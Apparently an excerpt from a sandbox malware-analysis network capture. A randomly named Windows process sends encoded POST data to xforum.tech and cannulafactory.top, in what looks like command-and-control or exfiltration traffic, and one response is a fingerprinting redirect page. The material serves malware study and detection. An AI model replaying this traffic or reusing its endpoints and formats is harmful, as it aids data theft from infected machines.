                  Data Ascii: 15.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.4
                  Sep 4, 2024 09:37:04.574182034 CEST | 1236 | IN | Data Raw: 37 2d 2e 32 39 32 2d 2e 37 35 37 2d 2e 33 30 34 2d 2e 37 39 34 2e 30 32 38 2d 2e 30 33 32 2e 32 39 33 2e 31 30 37 2e 36 31 38 2e 34 38 38 2e 37 33 31 2e 32 32 39 2e 30 36 38 2e 35 33 32 2d 2e 30 33 32 2e 35 30 37 2d 2e 32 35 37 2d 2e 30 32 31 2d
                  Data Ascii: 7-.292-.757-.304-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.034.334-.012.326-.16.181-.553.086-.767" transform="translat


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  21 | 192.168.2.4 | 49758 | 103.224.182.242 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:09.917349100 CEST | 742 | OUT | POST /647x/ HTTP/1.1
                  Host: www.xforum.tech
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.xforum.tech
                  Referer: http://www.xforum.tech/647x/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 38 67 68 35 75 6b 50 30 6c 55 43 6e 62 75 6b 77 39 69 2f 59 36 74 67 57 2b 57 39 42 49 34 68 47 36 31 6b 51 6f 71 74 55 4d 61 47 64 49 36 76 54 44 79 4e 65 37 65 62 4a 2b 41 4e 6d 2f 63 6f 56 53 6a 4a 74 79 67 4d 57 69 78 44 56 79 64 7a 32 6a 30 38 59 56 77 55 47 74 4f 4b 36 53 63 73 7a 5a 45 39 64 62 33 6d 68 2b 6b 73 77 66 56 6e 46 45 6b 2b 7a 64 41 6b 63 38 73 4c 2f 47 39 57 58 4e 74 64 36 36 4f 6e 79 67 4f 43 58 73 50 68 41 6e 65 64 74 6c 61 4b 50 6f 66 38 4a 34 42 58 74 61 72 73 2f 72 6a 39 51 50 4f 30 6e 74 64 38 6d 66 6a 30 66 4c 51 3d 3d
                  Data Ascii: 56gD=Ily3CeU2s+qA8gh5ukP0lUCnbukw9i/Y6tgW+W9BI4hG61kQoqtUMaGdI6vTDyNe7ebJ+ANm/coVSjJtygMWixDVydz2j08YVwUGtOK6ScszZE9db3mh+kswfVnFEk+zdAkc8sL/G9WXNtd66OnygOCXsPhAnedtlaKPof8J4BXtars/rj9QPO0ntd8mfj0fLQ==
                  Sep 4, 2024 09:37:10.520262957 CEST | 872 | IN | HTTP/1.1 200 OK
                  date: Wed, 04 Sep 2024 07:37:10 GMT
                  server: Apache
                  set-cookie: __tad=1725435430.3329141; expires=Sat, 02-Sep-2034 07:37:10 GMT; Max-Age=315360000
                  vary: Accept-Encoding
                  content-encoding: gzip
                  content-length: 577
                  content-type: text/html; charset=UTF-8
                  connection: close
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                  Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  22 | 192.168.2.4 | 49759 | 103.224.182.242 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:12.467273951 CEST | 762 | OUT | POST /647x/ HTTP/1.1
                  Host: www.xforum.tech
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.xforum.tech
                  Referer: http://www.xforum.tech/647x/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 56 47 36 58 38 51 76 62 74 55 4e 61 47 64 47 61 76 4b 48 79 4e 72 37 65 65 38 2b 46 4e 6d 2f 63 38 56 53 69 56 74 79 58 77 56 6a 68 44 62 72 4e 7a 30 6e 30 38 59 56 77 55 47 74 4b 69 45 53 66 63 7a 5a 30 74 64 63 6d 6d 69 68 55 73 33 57 31 6e 46 41 6b 2b 33 64 41 6b 75 38 74 6e 52 47 2f 75 58 4e 73 4e 36 36 66 6e 78 71 4f 43 56 7a 66 67 71 67 62 73 49 74 61 58 30 68 4f 73 49 36 67 6a 76 62 74 39 6c 36 53 63 48 64 4f 51 55 77 61 31 53 53 67 4a 57 51 63 70 32 48 34 59 46 4b 32 4f 71 71 76 30 46 4b 6f 31 69 7a 44 59 3d
                  Data Ascii: 56gD=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKVG6X8QvbtUNaGdGavKHyNr7ee8+FNm/c8VSiVtyXwVjhDbrNz0n08YVwUGtKiESfczZ0tdcmmihUs3W1nFAk+3dAku8tnRG/uXNsN66fnxqOCVzfgqgbsItaX0hOsI6gjvbt9l6ScHdOQUwa1SSgJWQcp2H4YFK2Oqqv0FKo1izDY=
                  Sep 4, 2024 09:37:13.213840008 CEST | 872 | IN | HTTP/1.1 200 OK
                  date: Wed, 04 Sep 2024 07:37:12 GMT
                  server: Apache
                  set-cookie: __tad=1725435432.1598786; expires=Sat, 02-Sep-2034 07:37:12 GMT; Max-Age=315360000
                  vary: Accept-Encoding
                  content-encoding: gzip
                  content-length: 577
                  content-type: text/html; charset=UTF-8
                  connection: close
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                  Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  23 | 192.168.2.4 | 49760 | 103.224.182.242 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:15.011987925 CEST | 10844 | OUT | POST /647x/ HTTP/1.1
                  Host: www.xforum.tech
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.xforum.tech
                  Referer: http://www.xforum.tech/647x/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 74 47 36 6b 30 51 73 38 5a 55 4b 61 47 64 4f 36 76 50 48 79 4e 4d 37 61 79 34 2b 46 78 70 2f 66 45 56 54 41 64 74 30 6d 77 56 73 68 44 62 6b 74 7a 33 6a 30 38 52 56 77 45 43 74 4f 47 45 53 66 63 7a 5a 32 46 64 4b 6e 6d 69 79 45 73 77 66 56 6e 5a 45 6b 2b 66 64 45 41 2b 38 74 54 76 47 4d 6d 58 44 73 39 36 35 70 62 78 69 4f 43 54 77 66 67 79 67 62 6f 62 74 61 36 50 68 4f 5a 74 36 67 58 76 62 59 77 71 6e 78 59 46 4f 38 4a 4a 6c 64 52 5a 56 7a 56 6a 51 72 6c 63 45 59 6b 6a 58 56 75 4f 71 50 77 56 65 49 78 6f 6c 7a 6d 31 5a 34 70 49 43 6f 79 30 65 49 6f 57 68 34 62 42 77 52 31 65 53 71 59 35 70 49 53 4b 32 4d 48 52 48 4d 65 79 56 6a 67 44 4b 77 61 6c 4c 72 7a 58 6c 59 56 49 51 2f 68 6a 45 6e 6d 54 6f 56 45 79 73 72 64 79 6a 31 37 49 73 2f 64 69 6a 30 71 75 6e 42 30 6f 69 42 4d 42 51 51 44 68 50 39 73 68 57 4b 72 4a 61 6e 33 6e 58 30 49 39 32 62 45 53 65 6a 59 64 59 [TRUNCATED]
                  Data Ascii: 56gD=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 [TRUNCATED]
                  Sep 4, 2024 09:37:15.711798906 CEST | 872 | IN | HTTP/1.1 200 OK
                  date: Wed, 04 Sep 2024 07:37:15 GMT
                  server: Apache
                  set-cookie: __tad=1725435435.2574839; expires=Sat, 02-Sep-2034 07:37:15 GMT; Max-Age=315360000
                  vary: Accept-Encoding
                  content-encoding: gzip
                  content-length: 577
                  content-type: text/html; charset=UTF-8
                  connection: close
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
                  Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  24 | 192.168.2.4 | 49761 | 103.224.182.242 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:17.554378986 CEST | 480 | OUT | GET /647x/?56gD=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.xforum.tech
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:37:18.200239897 CEST | 1236 | IN | HTTP/1.1 200 OK
                  date: Wed, 04 Sep 2024 07:37:18 GMT
                  server: Apache
                  set-cookie: __tad=1725435438.2178816; expires=Sat, 02-Sep-2034 07:37:18 GMT; Max-Age=315360000
                  vary: Accept-Encoding
                  content-length: 1473
                  content-type: text/html; charset=UTF-8
                  connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 78 66 6f 72 75 6d 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 35 36 67 44 3d 46 6e 61 58 42 6f 78 35 34 2b 61 67 37 67 35 69 77 6d 50 36 6c 45 75 61 59 72 4e 79 39 78 66 34 33 65 52 63 68 68 4a 79 48 63 78 6a 32 6e 42 73 76 5a 5a 54 54 6f 66 42 44 75 44 72 54 52 78 44 77 4a 53 2f 78 6c 78 71 32 38 77 46 62 43 4a 37 6f 6b 55 70 68 30 50 59 70 4f 47 75 73 52 67 42 54 43 74 69 30 2b 47 71 52 66 39 4e 59 45 4a 33 4d 33 6e 49 67 33 73 3d 26 67 54 53 70 63 3d 4b 68 62 38 70 54 26 27 [TRUNCATED]
                  Data Ascii: <html><head><title>xforum.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.xforum.tech/647x/?56gD=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&gTSpc=Khb8pT&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text
                  Sep 4, 2024 09:37:18.200257063 CEST | 509 | IN | Data Raw: 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 35 36 67 44
                  Data Ascii: ="#000000"><div style='display: none;'><a href='http://www.xforum.tech/647x/?56gD=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&gTSpc=Khb8pT&fp=-3'>Click here to enter


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  25 | 192.168.2.4 | 49762 | 18.183.3.45 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:24.025834084 CEST | 763 | OUT | POST /l90v/ HTTP/1.1
                  Host: www.cannulafactory.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.cannulafactory.top
                  Referer: http://www.cannulafactory.top/l90v/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 66 54 67 75 6c 36 77 7a 79 2f 41 41 76 44 6d 76 72 69 37 37 77 6b 75 79 56 6d 4f 50 59 41 56 45 72 38 37 71 5a 4c 33 57 63 37 34 69 48 30 65 45 62 4a 4b 6e 6a 56 6b 73 58 59 67 6b 50 73 6c 6b 4c 45 6e 33 76 36 44 59 4f 52 6d 61 2f 2f 69 54 52 70 69 58 2f 32 7a 57 6d 75 35 69 61 4f 68 77 44 6e 5a 53 57 50 55 7a 72 77 57 6c 51 6a 77 70 4a 6f 64 42 30 54 6a 2f 6b 31 32 71 7a 38 41 7a 39 66 6d 76 45 46 41 2f 6e 38 67 48 32 59 6e 56 6e 33 65 61 76 55 63 67 44 35 52 6d 37 6d 4b 2b 30 64 56 34 66 58 65 39 6c 47 33 65 43 77 35 48 45 76 6a 6c 53 51 3d 3d
                  Data Ascii: 56gD=37FT9IHDPOAKfTgul6wzy/AAvDmvri77wkuyVmOPYAVEr87qZL3Wc74iH0eEbJKnjVksXYgkPslkLEn3v6DYORma//iTRpiX/2zWmu5iaOhwDnZSWPUzrwWlQjwpJodB0Tj/k12qz8Az9fmvEFA/n8gH2YnVn3eavUcgD5Rm7mK+0dV4fXe9lG3eCw5HEvjlSQ==
                  Sep 4, 2024 09:37:24.906677008 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.20.1
                  Date: Wed, 04 Sep 2024 07:37:24 GMT
                  Content-Type: text/html
                  Content-Length: 3971
                  Connection: close
                  ETag: "6526681e-f83"
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                  Sep 4, 2024 09:37:24.906693935 CEST | 224 | IN | Data Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; ba
                  Sep 4, 2024 09:37:24.906702995 CEST | 1236 | IN | Data Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 39 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68
                  Data Ascii: ckground-color: #900; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #000; }
                  Sep 4, 2024 09:37:24.906717062 CEST | 1236 | IN | Data Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e 67 20 77 65 62 70 61 67 65
                  Data Ascii: iv class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with
                  Sep 4, 2024 09:37:24.906727076 CEST | 212 | IN | Data Raw: 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 70 6f 77 65 72 65 64 62 79 2e 70 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 5b 20 50 6f 77 65 72 65 64 20 62 79 20 52 65
                  Data Ascii: g src="poweredby.png" alt="[ Powered by Red Hat Enterprise Linux ]" width="88" height="31" /></a> </div> </div> </body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  26 | 192.168.2.4 | 49763 | 18.183.3.45 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:26.579575062 CEST | 783 | OUT | POST /l90v/ HTTP/1.1
                  Host: www.cannulafactory.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.cannulafactory.top
                  Referer: http://www.cannulafactory.top/l90v/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
